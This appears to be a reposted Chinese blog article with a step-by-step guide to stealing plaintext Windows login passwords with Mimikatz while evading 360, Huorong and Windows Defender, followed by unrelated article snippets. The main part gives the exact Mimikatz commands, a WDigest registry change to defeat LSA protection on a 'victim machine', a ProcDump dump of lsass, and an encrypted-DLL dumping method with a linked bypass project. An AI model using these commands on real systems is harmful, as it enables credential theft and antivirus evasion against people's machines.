Mimikatz的使用及免杀方向(过360,火狐和WindowsDefinder)

news/2024/9/28 1:18:03

一. Mimikatz加修改注册表绕过LSA保护(暂不考虑EDR和WD)

  • Mimikatz原理:Mimikatz通过逆向获取存储在lsass.exe进程中的明文登录密码。(lsass.exe用于本地安全和登陆策略)。首先使用Mimikatz抓取时必须是管理员权限,在win10,win11,win2012等版本中,系统会开启LSA保护,明文密码字段会显示null。
  • 第一步提权:privilege::debug
  • 第二步抓取:sekurlsa::logonPasswords
  • 关闭LSA保护:管理员权限对注册表进行修改,随后使用脚本或者任意方法重启系统,使受害机的管理员重新登陆,此次登录的明文密码将会保存在lsass.exe 进程中,使用Mimikatz再次抓取可显示明文密码。若恢复注册表可直接将1改为0。
  • 修改命令:reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

二. Procdump dump绕过360,火狐

  • 绕过思路:由于Mimikatz的强大,各大EDR已经在防护Mimikatz的道路上越走越远,所以我们如果 针对Mimikatz做免杀哪怕过静态,还要考虑各种姿势绕过抓取hash的动作,但是这无疑需要很多的时间,因此我们可以考虑取出已经存储在lsass.exe的明文密码,通过本地的Mimikatz进行处理得到密码。
  • 实施:前提已经关闭LSA保护并且为管理员权限,使用微软项目Procdump进行Dump(由于是微软项目,各EDR都不会报毒), 获取lsass进程储存的密码信息保存为niuma.dmp。
  • Procdump项目地址:https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump
  • 命令:ProcDump.exe -accepteula -ma lsass.exe niuma.dmp
  • 将生成的niuma.dmp保存到本地,在本地使用Mimikatz获取明文密码,此时因为已经将信息拉取到本地环境Mimikatz同目录中,所以普通用户权限就可以直接读取niuma.dmp中的明文密码。
  • 第一步:sekurlsa::minidump niuma.dmp
  • 第二步:sekurlsa::logonPasswords full

三. DLL文件加密储存绕过360,火狐和Windowsdefinder

  • 原理:由于Windowdefinder 检测逻辑是文件层只要是lsass.exe生成的存储文件就会报毒删除,因此需要在内存存储中通过DLL干扰对存储加密绕过WD。
  • 实施:前提已经关闭LSA保护并且为管理员权限,在运行中可能报错没有指定模块参考,需要查找该DLL文件的依赖项保存到同一目录,使用命令生成加密test.log,保存路径C:/Windows/Tmep,将文件保存到本地,解密test.log获取初始存储信息,随后与二相同mimikatz获取明文密码。
  • 第一步生成加密文件:rundll32 DumpHash.dll dllmain
  • 第二步本地解密命令:mimikatz 解密.exe test.log 1.bin
  • 第三步读取明文:sekurlsa::minidump 1.bin sekurlsa::logonPasswords full(与二相同不再截图)

四. DLL文件及解密文件

  • Github项目地址:https://github.com/xjsafe/MimikatzBypass


转自原文连接地址: https://www.vpss.cc/381.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ryyt.cn/news/64970.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

轻松创作原创文章,AI智能写作工具为你一键生成!

在这个信息泛滥的时代,原创内容成为了稀缺资源。对于创作者而言,如何在快节奏的生活中保持高质量的输出,成为了一个巨大的挑战。AI智能写作工具的崛起,为我们提供了一种全新的解决方案。以下是一篇探讨AI智能写作工具深度价值的文章。在这个信息泛滥的时代,原创内容成为了…

使用re的正则表达式提取腾讯体育新闻摘要

首先确认要爬取的信息所在网页是静态还是动态,打开浏览器开发者工具抓包,下拉页面更新体育新闻的摘要(summary),同时查看网络面板,筛选fetch/xhr发起的请求的响应,随着下拉动作,能发现对https://matchweb.sports.qq.com/feeds/list的请求的增加。爬取的目标网页是动态的…

‌华为手机记录密码后页面显示的用户名可以通过修改设置来隐藏

1、打开手机主页面,进入【手机设置】。 2、在设置界面中,找到并选择【安全】菜单。 3、进入 “密码保险箱”。 4、进入 “管理应用自动填充” 5、关闭 保存和自动填充

揭秘Dreamforce 2024十大亮点:AI+数据新时代来了!

一年一度的Dreamforce大会于2024年9月17日至19日如期举行,这场Salesforce的旗舰盛会聚焦于AI与数据的深度融合,带来了诸多革命性发布。 无论你是企业用户、Salesforce从业者,还是对AI和数据感兴趣的技术爱好者,以下这十大亮点绝对值得关注。 Agentforce:开启企业智能代理人…

第一次结对作业之需求分析和原型设计

这个作业属于哪个课程 首页 - 软件工程2024 - 福州大学 - 班级博客 - 博客园这个作业要求在哪里 2024秋软件工程结对作业(第一次之需求分析和原型设计) - 作业 - 软件工程2024 - 班级博客 - 博客园 这个作业的目标 结对作业,进行需求分析和原型设计学号 102202130、04220140…

希捷硬盘插入电脑后,电脑很卡顿是什么原因

希捷硬盘插入电脑后,电脑出现卡顿现象,可能由多种原因造成。以下是一些可能的原因及相应的解决方案: 一、硬件连接问题接口或线缆问题: 检查移动硬盘的连接口和线缆是否损坏,尝试更换不同的连接线缆或USB接口。 确保USB接口供电充足,特别是对于高容量的硬盘,可能需要更稳…

工业 RJ 连接器:DRP10188321011 DRP10188321012 DRP10188400001 DRP10188400002 提供提供直线式和45电缆出口

工业 RJ 系列模块化以太网插头提供符合 ANSI/TIA-568.2-D 的 CAT6A 性能。工业以太网连接器能够实现以太网和其他工业协议的物联网连接,覆盖了从企业/云到工厂车间中传感器/执行器的所有操作层面。工业 RJ 系列模块化以太网插头提供符合 ANSI/TIA-568.2-D 的 CAT6A 性能。它在…

【GiraKoo】PowerShell美化笔记

【GiraKoo】PowerShell美化笔记 oh-my-posh init pwsh --config "$env:POSH_THEMES_PATH/powerlevel10k_lean.omp.json" | Invoke-Expression#------------------------------- ps-read-line ------------------------------- # 引入 ps-read-line Import-Module PSR…